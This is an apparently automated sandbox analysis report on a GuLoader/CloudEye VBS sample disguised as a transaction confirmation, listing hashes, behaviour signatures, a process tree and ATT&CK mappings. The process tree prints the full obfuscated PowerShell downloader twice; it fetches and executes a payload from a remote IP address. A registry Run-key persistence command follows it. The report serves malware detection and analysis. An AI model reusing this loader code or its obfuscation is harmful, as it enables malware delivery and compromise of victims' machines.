Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    28-06-2024 01:21

General

  • Target

    Transaction_Execution_Confirmation_000000.vbs

  • Size

    187KB

  • MD5

    37f090cc76db33c457b77c6b2c6bb13d

  • SHA1

    7c499fca1564ea4fb48cc2b72212bc3f857443ab

  • SHA256

    36e517cbfb12bd2e58446d7ae27d76baf3e454a793e8c629667fe067839ec23f

  • SHA512

    90aeb5b01c9309c49f35541d97f7532ed7a564fee986bf111a6f33bb41339e54f9972368179632ee5d6bdd8840811dc665a56ff5a26b159bbe764279f7be0de3

  • SSDEEP

    3072:VmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZJ:V08GxbKja3+DCbKCvBB/WnHXC/sLJFJW

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transaction_Execution_Confirmation_000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111 Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111';$Concordens = 1;Function Graasteners($Lipoferous){$Tamilers=$Lipoferous.Length-$Concordens;$Skvttende98='SUBSTRIN';$Skvttende98+='G';For( $Ozonospheric=1;$Ozonospheric -lt $Tamilers;$Ozonospheric+=2){$Beruselsernes+=$Lipoferous.$Skvttende98.Invoke( $Ozonospheric, $Concordens);}$Beruselsernes;}function strkningspunkter($Paleothermal){ & ($Visnomy) ($Paleothermal);}$Dynamoers=Graasteners 'TM o.zFiNl l a /F5F. 0, F( W i.n dko wMsH NBT, S1H0m.c0 ; HW iFn 6.4 ;D .x 6 4A;s .r v :,1,2 1F. 0d) PGYeAcUkFo./F2I0 1S0,0C1R0 1F FPi.rKeEfPoPxF/,1S2 1 .,0S ';$Rykindene=Graasteners 'JU.sEeMr -sA.gUeNnSt, ';$Unmobilised=Graasteners 'KhTt t,pF: / /M1 0 3S.O1M9 5S. 2P3F7c. 4,3T/BMMiGnJiTmCu,m,tCrFy kPkSeBtK.tdMeHpDl.oSyG ';$Albatrosen=Graasteners ' >f ';$Visnomy=Graasteners ' i eCxS ';$Skansekldningers='Cementstberis';$Forlagsprotokol = Graasteners ' eGc,hDo. % a,p,pFdFaHtAa % \ P o.s,t eGrAipo r m.o sDt..,HCeCb, &H&s eFc,h.o, WtH ';strkningspunkter (Graasteners ' $TgPldo b a lS: nMoAnUc.oBs m o pTo lDi tpi.s m = (.c,m,dR A/Bc S$,FYo r lIa,g s pDrToStuo,kBoRlC)H ');strkningspunkter (Graasteners '.$Bg,l.oFb aLl.: BSr uDg.e r fCl.a dCe,r,sA= $ U,nSm.oAb.iKl.iOs,e dS..s.pLlNi,t (M$HAUl bSa t rUoesKeSnS) ');strkningspunkter (Graasteners ',[ NSe tI. S eAr,vCiBc eBPBoUi n.t M,aBn.aHg eOrA] :D:sSTe cFu,rMi,t y PKrUo t.o c.oSlB U= a[ NOeZt .TS.eVcSu.r,i t.yOPVr oStPo cBo.lpT ypp.eQ]U:r:GTDlAs 1 2A ');$Unmobilised=$Brugerfladers[0];$stoftilfrsels= (Graasteners ' $Tg lUoPbNa l.: SPu,pFeBrAf oHr m,a lMnJe s sF=BN e.w - O,bEjSeRc.t ,SCyMs,t ebm .SNUe tT.FWPe b.C lSiAe nft');$stoftilfrsels+=$noncosmopolitism[1];strkningspunkter ($stoftilfrsels);strkningspunkter (Graasteners 'B$PS u pPeAr f o r.m aRl n e.s s..SH e a dTe.ros,[L$DR y k.i nRd e n e ]F=.$ D.y n.a mNo e rRs. ');$Naboskab=Graasteners ',$ SSuup eSr.fCoTr mUaNl,n egs sA.JD oSwMnKl o.abd.FSiSl e,(,$ UDnOmYoDbPiIlAiUsBe do,.$wT,u,bNe,rAkKl,e,rM) ';$Tuberkler=$noncosmopolitism[0];strkningspunkter (Graasteners 'T$ng l.oSbKaAl,:fa e n dBr.iAnHg sCfAo r sWl,a g,=C(,TBe smt -IP a,tVhT S$VT u bCeUr kBlRe.rC)M ');while (!$aendringsforslag) {strkningspunkter (Graasteners ',$Ag l oGb,aSl :.MEaUySp oslceI= $etHrKu,e ') ;strkningspunkter $Naboskab;strkningspunkter (Graasteners 'HSKtAa.r,tR-MS l e eGpJ .4O ');strkningspunkter (Graasteners ',$ g lRoSb aTlF:SaCe.n,d.r,iFnFgGsBfKoRrMsPl a gZ=D(ATIeSs tB-,P a.t hS $CT,u bMe r k l e,r )i ') ;strkningspunkter (Graasteners ' $SgBl oGbkaAl : dBu.lAcMi f,lGuOoSu s = $Fg,lAo bLa.ls:OR eMs p e cFtSa nFtL+.+U%C$GB,r uDgReMr,f.l a.dAeDr s .UcdoSuUnst. ') ;$Unmobilised=$Brugerfladers[$dulcifluous];}$Paatnktes=334318;$Bewet=26301;strkningspunkter (Graasteners ' $.g.lHoSb,a lP:FI,s c rHe,mke.rBsS .=K ,G eCtP-PC oAn,tTeGnOt S$.T uVbHeBrRk lDeVr, ');strkningspunkter (Graasteners ' $ g.lBo.b.aCl :SBFa g e fMoDr mFeUnS A=. D[KS.y sMtVeSmU.DCHoSn v e r t ] : :VF,rUo,mPBMa sFeA6.4 S tDr i.nFgC( $MI sMcKrSe m.e rDsT) ');strkningspunkter (Graasteners ' $,g,l.oCbDa lS:,U nTiMnHvSo.kNa.b l eT =, S[FSSyBs t e.m .IT eRxAtP. E n.cCoKdKi nIgU].:F:.A.SPC I IV.eGOeKtDS.t,rCi n.g ( $TB.aAgGeBfEo rCm.e.nL)P ');strkningspunkter (Graasteners ',$ gAlEo.bOa lR:RI c hSnOo.gMrEaZpLh,i,eMs.=T$ U nSi n v oTkEaMb l eS. s u,b.s tCr i.nBg (F$ P a a,t n kAt e sM,A$CBHe.w,e t )A ');strkningspunkter $Ichnographies;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posteriormost.Heb && echo t"
        3⤵
          PID:2552
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111 Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111';$Concordens = 1;Function Graasteners($Lipoferous){$Tamilers=$Lipoferous.Length-$Concordens;$Skvttende98='SUBSTRIN';$Skvttende98+='G';For( $Ozonospheric=1;$Ozonospheric -lt $Tamilers;$Ozonospheric+=2){$Beruselsernes+=$Lipoferous.$Skvttende98.Invoke( $Ozonospheric, $Concordens);}$Beruselsernes;}function strkningspunkter($Paleothermal){ & ($Visnomy) ($Paleothermal);}$Dynamoers=Graasteners 'TM o.zFiNl l a /F5F. 0, F( W i.n dko wMsH NBT, S1H0m.c0 ; HW iFn 6.4 ;D .x 6 4A;s .r v :,1,2 1F. 0d) PGYeAcUkFo./F2I0 1S0,0C1R0 1F FPi.rKeEfPoPxF/,1S2 1 .,0S ';$Rykindene=Graasteners 'JU.sEeMr -sA.gUeNnSt, ';$Unmobilised=Graasteners 'KhTt t,pF: / /M1 0 3S.O1M9 5S. 2P3F7c. 4,3T/BMMiGnJiTmCu,m,tCrFy kPkSeBtK.tdMeHpDl.oSyG ';$Albatrosen=Graasteners ' >f ';$Visnomy=Graasteners ' i eCxS ';$Skansekldningers='Cementstberis';$Forlagsprotokol = Graasteners ' eGc,hDo. % a,p,pFdFaHtAa % \ P o.s,t eGrAipo r m.o sDt..,HCeCb, &H&s eFc,h.o, WtH ';strkningspunkter (Graasteners ' $TgPldo b a lS: nMoAnUc.oBs m o pTo lDi tpi.s m = (.c,m,dR A/Bc S$,FYo r lIa,g s pDrToStuo,kBoRlC)H ');strkningspunkter (Graasteners '.$Bg,l.oFb aLl.: BSr uDg.e r fCl.a dCe,r,sA= $ U,nSm.oAb.iKl.iOs,e dS..s.pLlNi,t (M$HAUl bSa t rUoesKeSnS) ');strkningspunkter (Graasteners ',[ NSe tI. S eAr,vCiBc eBPBoUi n.t M,aBn.aHg eOrA] :D:sSTe cFu,rMi,t y PKrUo t.o c.oSlB U= a[ NOeZt .TS.eVcSu.r,i t.yOPVr oStPo cBo.lpT ypp.eQ]U:r:GTDlAs 1 2A ');$Unmobilised=$Brugerfladers[0];$stoftilfrsels= (Graasteners ' $Tg lUoPbNa l.: SPu,pFeBrAf oHr m,a lMnJe s sF=BN e.w - O,bEjSeRc.t ,SCyMs,t ebm .SNUe tT.FWPe b.C lSiAe nft');$stoftilfrsels+=$noncosmopolitism[1];strkningspunkter ($stoftilfrsels);strkningspunkter (Graasteners 'B$PS u pPeAr f o r.m aRl n e.s s..SH e a dTe.ros,[L$DR y k.i nRd e n e ]F=.$ D.y n.a mNo e rRs. ');$Naboskab=Graasteners ',$ SSuup eSr.fCoTr mUaNl,n egs sA.JD oSwMnKl o.abd.FSiSl e,(,$ UDnOmYoDbPiIlAiUsBe do,.$wT,u,bNe,rAkKl,e,rM) ';$Tuberkler=$noncosmopolitism[0];strkningspunkter (Graasteners 'T$ng l.oSbKaAl,:fa e n dBr.iAnHg sCfAo r sWl,a g,=C(,TBe smt -IP a,tVhT S$VT u bCeUr kBlRe.rC)M ');while (!$aendringsforslag) {strkningspunkter (Graasteners ',$Ag l oGb,aSl :.MEaUySp oslceI= $etHrKu,e ') ;strkningspunkter $Naboskab;strkningspunkter (Graasteners 'HSKtAa.r,tR-MS l e eGpJ .4O ');strkningspunkter (Graasteners ',$ g lRoSb aTlF:SaCe.n,d.r,iFnFgGsBfKoRrMsPl a gZ=D(ATIeSs tB-,P a.t hS $CT,u bMe r k l e,r )i ') ;strkningspunkter (Graasteners ' $SgBl oGbkaAl : dBu.lAcMi f,lGuOoSu s = $Fg,lAo bLa.ls:OR eMs p e cFtSa nFtL+.+U%C$GB,r uDgReMr,f.l a.dAeDr s .UcdoSuUnst. ') ;$Unmobilised=$Brugerfladers[$dulcifluous];}$Paatnktes=334318;$Bewet=26301;strkningspunkter (Graasteners ' $.g.lHoSb,a lP:FI,s c rHe,mke.rBsS .=K ,G eCtP-PC oAn,tTeGnOt S$.T uVbHeBrRk lDeVr, ');strkningspunkter (Graasteners ' $ g.lBo.b.aCl :SBFa g e fMoDr mFeUnS A=. D[KS.y sMtVeSmU.DCHoSn v e r t ] : :VF,rUo,mPBMa sFeA6.4 S tDr i.nFgC( $MI sMcKrSe m.e rDsT) ');strkningspunkter (Graasteners ' $,g,l.oCbDa lS:,U nTiMnHvSo.kNa.b l eT =, S[FSSyBs t e.m .IT eRxAtP. E n.cCoKdKi nIgU].:F:.A.SPC I IV.eGOeKtDS.t,rCi n.g ( $TB.aAgGeBfEo rCm.e.nL)P ');strkningspunkter (Graasteners ',$ gAlEo.bOa lR:RI c hSnOo.gMrEaZpLh,i,eMs.=T$ U nSi n v oTkEaMb l eS. s u,b.s tCr i.nBg (F$ P a a,t n kAt e sM,A$CBHe.w,e t )A ');strkningspunkter $Ichnographies;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posteriormost.Heb && echo t"
            4⤵
              PID:2900
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2308
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "idite" /t REG_EXPAND_SZ /d "%Parcelhusomraades114% -w 1 $Unrealise=(Get-ItemProperty -Path 'HKCU:\Forfordelte\').Selvskrevet;%Parcelhusomraades114% ($Unrealise)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1628
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "idite" /t REG_EXPAND_SZ /d "%Parcelhusomraades114% -w 1 $Unrealise=(Get-ItemProperty -Path 'HKCU:\Forfordelte\').Selvskrevet;%Parcelhusomraades114% ($Unrealise)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1648

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1UFXVER4CFWKJ1V4WY3R.temp
        Filesize

        7KB

        MD5

        102918b7ebde8582a952826b86bd8dc7

        SHA1

        d831e2b13b6b799a9edca833f8e17445ce51e51c

        SHA256

        a31339a811f318ab176ea296d9865f5f732c8ec50fec4d33c307ba9832fb7bd6

        SHA512

        212ba14ca4d53aa62c059d190849dab746c80bf354f75bb6c6433c3d65b6c46d81e316e3c55bacf91dc30d064836ca8067ba411350c1111f9de7438fab190650

      • C:\Users\Admin\AppData\Roaming\Posteriormost.Heb
        Filesize

        469KB

        MD5

        3f23a530f6d6ccaa63bae1e6741b03f6

        SHA1

        363207a5637e5bb7b2a7d7ba933661562cfaf506

        SHA256

        c2fbb6039b145b52d429bcaf5ffb57cc83951c8032e06edfc19bb36dfe5bdede

        SHA512

        b88ecae312e9dbd2dbf409b9097434968999dcf44ddf4257937725682ecb5e233b3a4fb676ebcef5bd36b072bb8feb7f3c7f3c1bcbc0d9b55610287d4bb9da31

      • memory/1624-36-0x0000000006700000-0x0000000009CB4000-memory.dmp
        Filesize

        53.7MB

      • memory/2308-38-0x00000000007F0000-0x0000000001852000-memory.dmp
        Filesize

        16.4MB

      • memory/2308-40-0x0000000001860000-0x0000000004E14000-memory.dmp
        Filesize

        53.7MB

      • memory/2836-22-0x000000001B6B0000-0x000000001B992000-memory.dmp
        Filesize

        2.9MB

      • memory/2836-27-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
        Filesize

        9.6MB

      • memory/2836-28-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
        Filesize

        9.6MB

      • memory/2836-23-0x0000000002290000-0x0000000002298000-memory.dmp
        Filesize

        32KB

      • memory/2836-24-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
        Filesize

        9.6MB

      • memory/2836-34-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
        Filesize

        9.6MB

      • memory/2836-35-0x000007FEF460E000-0x000007FEF460F000-memory.dmp
        Filesize

        4KB

      • memory/2836-21-0x000007FEF460E000-0x000007FEF460F000-memory.dmp
        Filesize

        4KB

      • memory/2836-26-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
        Filesize

        9.6MB

      • memory/2836-43-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
        Filesize

        9.6MB

      • memory/2836-25-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
        Filesize

        9.6MB